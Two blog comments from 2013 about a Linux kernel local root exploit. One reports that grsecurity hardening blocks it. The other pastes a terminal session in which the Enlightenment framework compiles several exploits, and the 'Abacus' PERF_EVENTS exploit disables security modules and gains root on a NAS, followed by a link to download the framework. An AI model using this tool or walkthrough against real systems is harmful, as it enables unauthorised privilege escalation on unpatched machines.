2 Comments

  1. says:

    May 17, 2013 at 12:02 pm

    Same here, I’m running a hardened Gentoo with grsec enabled, and the exploit fails.
    Thanks to the Gentoo Hardened team for all the work, because it is really great!

  2. says:

    May 27, 2013 at 10:13 am

    I tried the semtex exploit on a few boxes – didn’t see one work.
    When I tried the Enlightenment abacus version of it though, bam. GotRoot.

    id
    uid=1000(test_user) gid=1000(test_user) groups=1000(test_user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
    test_user@officenas:/enlightenment$ ./run_nonnull_exploits.sh
    Compiling exp_abacus.c…OK.
    Compiling exp_cheddarbay.c…OK.
    Compiling exp_ingom0wnar.c…OK.
    Compiling exp_moosecox.c…OK.
    Compiling exp_paokara.c…OK.
    Compiling exp_powerglove.c…OK.
    Compiling exp_sieve.c…OK.
    Compiling exp_therebel.c…OK.
    Compiling exp_vmware.c…failed.
    Compiling exp_wunderbar.c…OK.
    Choose your exploit:
    [0] Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root
    [1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
    [2] Sieve: Linux 2.6.18+ move_pages() infoleak
    [3] Exit
    > 0
    ——————————————————————————
    In art, rebellion is consummated and perpetuated in the act of real
    creation, not in criticism or commentary. –Camus
    ——————————————————————————
    [+] Resolved set_fs_root to 0xffffffff8111b98f
    [+] Resolved set_fs_pwd to 0xffffffff8111b9ee
    [+] Resolved __virt_addr_valid to 0xffffffff81030c68
    [+] Resolved init_task to 0xffffffff8160d020 (via System.map)
    [+] Resolved init_fs to 0xffffffff8162dd20 (via System.map)
    [+] Resolved default_exec_domain to 0xffffffff81617600 (via System.map)
    [+] Resolved bad_file_ops to 0xffffffff81412cc0 (via System.map)
    [+] Resolved bad_file_aio_read to 0xffffffff8110da64
    [+] Resolved selinux_enforcing to 0xffffffff817ebb38 (via System.map)
    [+] Resolved selinux_enabled to 0xffffffff81634640 (via System.map)
    [+] Resolved apparmor_enabled to 0xffffffff81635b8c (via System.map)
    [+] Resolved security_ops to 0xffffffff817ea2f0 (via System.map)
    [+] Resolved default_security_ops to 0xffffffff81630ae0 (via System.map)
    [+] Resolved sel_read_enforce to 0xffffffff8116b410
    [+] Resolved audit_enabled to 0xffffffff817b10fc (via System.map)
    [+] Resolved commit_creds to 0xffffffff81063f0e
    [+] Resolved prepare_kernel_cred to 0xffffffff810641c7
    [+] Resolved xen_start_info to 0xffffffff8172ed38 (via System.map)
    [+] Resolved ptmx_fops to 0xffffffff817f8f60 (via System.map)
    [+] Resolved mark_rodata_ro to 0xffffffff8102dc7f
    [+] Resolved set_kernel_text_ro to 0xffffffff8102dc4d
    [+] Resolved make_lowmem_page_readonly to 0xffffffff8100622f
    [+] Resolved make_lowmem_page_readwrite to 0xffffffff81006263
    [!] Array base is 0xffffffff817dbb00
    [!] Detected structure size of 4 bytes
    [!] Targeting 0xffffffff8172d048
    [+] Got ring0!
    [+] Adjusted from interrupt handler to process context
    [+] Detected 2.6/3.x style 8k stacks, with current at 0xffff880214135850 and cred support
    [+] Disabled security of : nothing, what an insecure machine!
    [+] Found ->fs offset at 0x478
    [+] Broke out of any chroots or mnt namespaces
    [+] Got root!
    root@officenas:/enlightenment# id
    uid=0(root) gid=0(root) groups=0(root)

    Enlightenment can be found here – http://grsecurity.net/~spender/exploits/enlightenment.tgz
